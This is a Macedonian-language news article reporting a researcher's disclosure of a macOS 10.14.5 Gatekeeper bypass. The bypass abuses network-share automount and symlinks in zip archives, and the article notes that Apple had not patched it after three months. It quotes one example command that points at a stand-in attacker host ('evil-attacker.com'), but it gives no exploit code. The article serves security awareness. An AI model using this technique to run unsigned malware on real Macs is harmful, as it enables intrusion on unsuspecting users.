Лесно е да се инсталира злонамерна апликација на Mac. Apple не ја поправи грешката ниту по три месеци

27. 5. 2019

Истражувачот за безбедност Филипо Каваларин објави предупредување за грешката во macOS 10.14.5 на својот блог. Ова се состои во можноста за целосно заобиколување на безбедносните мерки на Gatekeeper. Според Каваларин, тој ја посочил грешката на Apple веќе во февруари оваа година, но компанијата не ја поправила во најновото ажурирање.

Gatekeeper беше развиен од Apple и вграден во неговиот десктоп оперативен систем за прв пат во 2012 година. Тоа е механизам што спречува апликација да работи без знаење и согласност на корисникот. Откако ќе преземете апликација, Gatekeeper автоматски го проверува нејзиниот код за да види дали софтверот е правилно потпишан од Apple.

Во својот блог пост, Каваларин наведува дека Gatekeeper, стандардно, смета дека и надворешното складирање и мрежните споделувања се безбедни локации. Секоја апликација што се наоѓа во овие цели може автоматски да се активира без да мора да помине низ проверката на Gatekeeper. Токму оваа функција може да се искористи за лансирање на малициозен софтвер без знаење на корисникот.

Еден аспект што дозволува неовластен пристап е функцијата за автоматско монтирање, која им овозможува на корисниците автоматски да монтираат мрежен удел едноставно со одредување патека што започнува со „/net/“. Како пример, Cavallarin ја наведува патеката „ls /net/evil-attacker.com/sharedfolder/“ која може да предизвика оперативниот систем да ја вчита содржината на папката „sharefolder“ на оддалечена локација што може да биде потенцијално злонамерна.

Начинот на кој функционира заканата можете да го погледнете во видеото:

Друг фактор е фактот дека ако е споделена зип архива што содржи специфична символска врска што води до функцијата за автоматско монтирање, таа нема да биде проверена од Gatekeeper. На овој начин, жртвата лесно може да ја преземе злонамерната архива и да ја отпакува, дозволувајќи му на напаѓачот да работи буквално каков било софтвер на Mac без знаење на корисникот. Пронаоѓачот, кој стандардно крие одредени екстензии, исто така има свој дел од оваа ранливост.

Каваларин на својот блог наведува дека Apple го привлече вниманието на ранливоста на оперативниот систем macOS на 22 февруари оваа година. Но, во средината на мај, Apple престана да комуницира со Каваларин, па Каваларин реши целата работа да ја објави во јавноста.

Извор: FCVL

Теми: складирање, автоматски, MacOS, Видео, Поставки, функција, корисник, Апликација, Јаболко

Дискусија за статијата

Вашето име

Вашиот коментар

Со пополнување на горенаведените податоци, потврдувам дека компанијата TEXT FACTORY s.r.o., со седиште во Брно, Durďákova 336/29, Černá Pole, поштенски број: 613 00, ID број: 06157831, регистрирана во Регионалниот суд во Brno, C. , вметнете 100399, ќе ги обработи моите лични податоци дадени во формуларот за регистрација пополнет од мене врз основа на легитимните интереси на TEXT FACTORY s.r.o. согласно член 6 став 1 писмо ѓ) GDPR и исполнување на законските обврски (член 6, став 1, буква в) GDPR), за следните цели: потребата да се обезбеди овластување на посетителите на веб-локациите управувани од TEXT FACTORY s.r.o., за активно да придонесуваат за објавени написи или во рамките на дискусија форуми и остварување на правата на TEXT FACTORY s.r.o. како администратор на овие форуми за дискусија. Повеќе информации за обработката на личните податоци и права може да најдете во Лекции за заштита на личните податоци. целиот текст

Тоа би можело да биде ве интересира

Поврзани